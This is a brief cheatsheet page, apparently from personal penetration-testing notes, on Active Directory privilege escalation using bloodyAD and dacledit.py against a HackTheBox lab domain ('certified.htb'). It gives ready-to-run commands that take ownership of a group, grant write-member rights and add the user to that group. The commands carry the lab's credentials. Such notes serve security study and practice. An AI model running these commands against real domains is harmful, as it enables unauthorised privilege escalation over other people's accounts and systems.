Privilege Escalation with bloodyAD

bloodyAD is a python swiss army knife toolset for privielges escalation

Cheatsheet of Capbabilities

Setting ownership over a group

bloodyAD --host "$IP" -d "certified.htb" -u "judith.mader" -p "judith09" set owner Management judith.mader

once adding yourself as an owner, you need to grant yourself write permissions using dacledit.py

python3 dacledit.py -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09'

Adding oneself as a member of a group

bloodyAD --host $IP -d 'certified.htb' -u 'judith.mader' -p 'judith09' add groupMember "Management" "judith.mader"
PreviousLegacy NotesNextAbusing ACLs/ACEs

Last updated